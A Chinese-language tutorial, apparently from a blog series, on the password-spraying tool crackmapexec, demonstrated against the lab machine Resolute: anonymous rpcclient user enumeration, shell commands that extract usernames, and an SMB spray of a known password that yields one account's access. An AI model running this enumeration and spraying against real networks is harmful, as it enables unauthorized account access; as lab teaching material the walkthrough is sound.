前言

今天要介紹最後一個密碼爆破工具crackmapexec(CME)，它跟hydra一樣能夠指定服務類型、指定輸入使用者的列表以及密碼列表。

正文

今天以靶機Resolute解釋如何使用crackmapexec，目前已知某個使用者的密碼為“Welcome123!“，利用rpcclient嘗試列舉出目標靶機的使用者有哪些。

rpcclient -U "" -N 10.10.10.169
enumdomusers

rpcclient可以匿名登入，將使用者指定空值即可，-N代表登入且不使用密碼。因為登入成功，我們才有辦法列舉出使用者，如果想知道有哪些群組，可以輸入enumdomgroups。

接著，將這個結果複製，並且只儲存使用者名稱的部分至檔案裡面，以利進行後續的爆破。

echo "user:[Administrator]..." > user.txt
cat users.txt| grep -o '\[.*\]'|grep -o -P '.*(?=rid:)'|sed 's/[][]//g' > cut_user.txt

cat user.txt那行指令將複製下來的全部文字進行拆解，只留下名稱的部分儲存至cut_user.txt，然後利用crackmapexec來猜解釋誰的密碼為Welcome123!

crackmapexec smb 10.10.10.169 -u cut_user.txt -p 'Welcome123!'

crackmapexec支援的服務有ssh、ldap、smb、ftp、rdp、mssql以及win-rm，這裡我們已知目標開啟port 445為smb服務，因此指定服務為smb。
-u指定使用者名稱或是使用者列表
-p指定密碼或是密碼列表

結果顯示，這組密碼為melianie的密碼，這樣就能取得目標靶機的存取權了。

今天的介紹到此結束，謝謝。

Reference

• crackmapexec github